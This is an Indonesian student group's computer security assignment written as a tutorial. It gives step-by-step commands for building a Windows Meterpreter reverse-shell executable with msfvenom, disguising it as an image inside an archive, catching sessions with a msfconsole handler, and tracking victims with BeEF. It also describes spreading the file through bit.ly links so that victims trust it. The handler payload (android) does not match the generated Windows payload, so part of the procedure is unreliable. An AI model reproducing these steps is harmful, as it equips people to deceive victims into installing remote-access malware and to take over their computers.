SISTEM KEAMANAN KOMPUTER
KELOMPOK 5
ANGGOTA KELOMPOK :
1. Oli
Chandra (1615015003)
2. Muhamad
Rizal (1615015012)
3. Dian
Fitriani (1615015024)
4. Israwadi
Idris (1615015029)
5. Kanseh
Resky Chrisdianto (1615015033)
6. Tobi
Setiawan (1615015039)
Dalam era digital yang semakin modern. Setiap orang akan segera tau
tentang berbagai informasi menarik yang sedang hangat diperbincangkan di dunia
maya. Banyak sekali hal hal yang terkadang tersebar sebagai berita yang tidak
benar (baca Hoax) dan juga banyak orang yang mempercayai berita tersebut. Dari
tingkat penasaran para pemirsa dunia maya (baca netizen) ada beberapa orang
yang berniat jahat untuk menyelipkan virus ataupun file berbahaya lainnya
kepada para netizen yang kepo tersebut.
Dalam hal ini banyak virus bahkan file berbahaya diselipkan dalam file
lainnya seperti dalam foto, video ataupun audio, hal ini menyebabkan banyak
orang yang penasaran akan langsung mendownload dan menjalankan file tersebut
tanpa diketahui sebelumnya bahwa file tersebut telah terinfeksi oleh virus
ataupun file berbahaya yang lainnya.
Menyelipkan file berbahaya kedalam file lain sebagai tempat persembunyian
sering dikenal sebagai exploit, hal ini merupakan jebakan paling ampuh untuk
menjerat para netizen yang sedang kepo dengan berita hangat yang sedang
beredar.
Disini kami akan memberikan cara-cara untuk melakukan exploit dan
menyebarkannya, tetapi hal ini kami lakukan hanya sebatas pembelajaran ya,
bukan karena niatan jahat untuk menyadap atau merusak komputer orang lain.
Baiklah langsung saja kita lakukan exploid melalui Kali linux.
Pertama kita membuka Kali Linux terlebih dahulu, lalu buka terminal dan masukkan perintah berikut ini
Msfvenom –p
windows/meterpreter/reverse_tcp –platform windows –f exe LHOST=192.168.1.104
LPORT=333 –o /root/Desktop/virus.exe
Setelah menjalankan perintah diatas selanjutnya kita cek di desktop
untuk melihat file exe yang telah kita buat sebelumnya.
Nah setelah file exe
yang kita buat sudah ada di desktop selanjutnya adalah kita samarkan file exe
ini dengan menggunakan foto, foto disini hanya berfungsi sebagai daya tarik
untuk memikat korbannya agar tidak curiga denga file exe ini. Dengan gambar dan
extensi file yang berbeda maka korban akan sulit membedakan apakah file
berbahaya atau tidak.
Langkah selanjutnya
adalah mencari gambar sesuai keinginan kita untuk digunakan untuk menyembunyikan file exe yang
kita buat.
Setelah mendapatkan
gambar yang kita mau lalu kita convert gambar png yang kita pilih
menjadi ico di web icoconvert
seperti gambar dibawah ini.
Pada halaman web
ICOConvert kita pilih gambar yang ingin di convert dan klik upload.
Setelah mengupload, pilih
size atau ukuran
yang kita perlukan untuk disisipkan
file exe,
klik convert hingga proses selesai dan dan download file yang sudah convert
tadi.
Setelah selesai
mengconvert dan mendownload selanjutnya adalah mengkompres
icon dan file exe nya dengan cara blok icon dan exe terus klik kanan add to
archive.
Setelah proses
kompres selesai icon akan menampilkan seperti yang dibawah ini
Setelah kita selesai
menyiapkan file yang telah kita kompres dengan file exe dan gambar tadi,
selanjutnya kita kembali ke terminal dan ketikkan perintah msfconsole
Tunggu beberapa saat hingga proses
selesai seperti gambar dibawah
Setelah selesai ketikkan
perintah berikut :
use
multi/handler
set
payload android/meterpreter/reverse_tcp
set
lhost 192.168.1.104
set
lport 333
show
options
Tunggu
beberapa saat hingga proses selesai seperti gambar dibawah
Setelah proses
sebelumnya selesai selanjutnya adalah memasukkan perintah exploit
Selanjutnya masukkan perintah sysinfo
Selanjutnya buka tool beef xss di kalilinux, tunggu
sampai beralih ke browser seperti pada gambar dan klik here. Situs beef ini digunakan untuki melihat perangkat mana
yang telah terinveksi oleh file yang telah buat tadi, jika file exploit yang
kita buat didownload dan dijalankan di komputer korban maka kita dapat mengakses komputer korban dari jauh saat korban aktif di jaringan internet.
Setelah proses selesai kita akan dialihkan ke laman baru seperti gambar dibawah ini.
Setelah itu kembali lagi laman sebelumnya dan
tampilannya akan berubah seperti dibawah ini
Apabila file exe yang kita buat telah dijalankan
korban maka akan muncul ip dari perangkat korban
Untuk mempermudah penyebaran file exenya kita ubah
link nya mejadi bit ly. Situs bit.ly
digunakan untuk memperpendek link yang kita punya, dengan demikian korban akan
yakin bahwa file yang akan di download adalah file biasa saja.
Setelah memperpendek
link file exploit, selanjutnya file tersebut dapat disebarkan, setelah itu
tinggal menunggu proses penyadapan.
Saat ini kami tidak
menyebarkan file exploid yang kami buat dikarenakan kami merasa khawatir bahwa
file tersebut dapat menimbulkan kerugian pada perangkat orang lain, sampai
disini pembahasan kami mengenai exsploit. Mohon maaf jika kurang jelas
materinya, karena kami masih dalam tahap belajar, mohon dimaklumi atas
kesalahan kesalahan kata yang ada dan tata bahasa yang kurang baku. Kami
mneyedari bahwa artikel ini sangat banyak kekurangannya, semoga dapat
bermanfaat bagi siapapun yang membacanya. Aminn.